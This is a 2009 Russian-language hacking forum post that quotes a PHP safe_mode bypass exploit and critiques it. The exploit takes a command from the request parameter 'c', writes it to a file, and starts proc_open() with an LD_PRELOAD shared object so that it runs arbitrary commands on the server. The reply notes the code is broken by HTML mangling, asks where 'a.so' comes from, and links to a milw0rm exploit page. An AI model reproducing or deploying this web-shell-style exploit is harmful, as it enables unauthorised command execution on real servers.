
24.07.2009, 14:53
|
|
Постоянный
Регистрация: 14.07.2005
Сообщений: 964
С нами:
10960226
Репутация:
1424
|
|
Сообщение от [underwater]
PHP safe_mode bypass via proc_open() and custom environment
Код:
<!--p $path="/var/www"; //change to your writable path $a=fopen($path."/.comm","w"); fputs($a,$_GET["c"]); fclose($a); $descriptorspec = array( 0--> array("pipe", "r"),
1 => array("file", $path."/output.txt","w"),
2 => array("file", $path."/errors.txt", "a" )
);
$cwd = '.';
$env = array('LD_PRELOAD' => $path."/a.so");
$process = proc_open('id > /tmp/a', $descriptorspec, $pipes, $cwd, $env); // example command - should not succeed
sleep(1);
$a=fopen($path."/.comm1","r");
echo "<strong>";
while (!feof($a))
{$b=fgets($a);echo $b;}
fclose($a);
?>;
</strong>
в архиве небыло этого и почисти код то '>'
и откуда кстати возмется 'a.so' ? опять не проверил (
http://milw0rm.com/exploits/7393
Последний раз редактировалось ShAnKaR; 24.07.2009 в 15:33..
|
|
|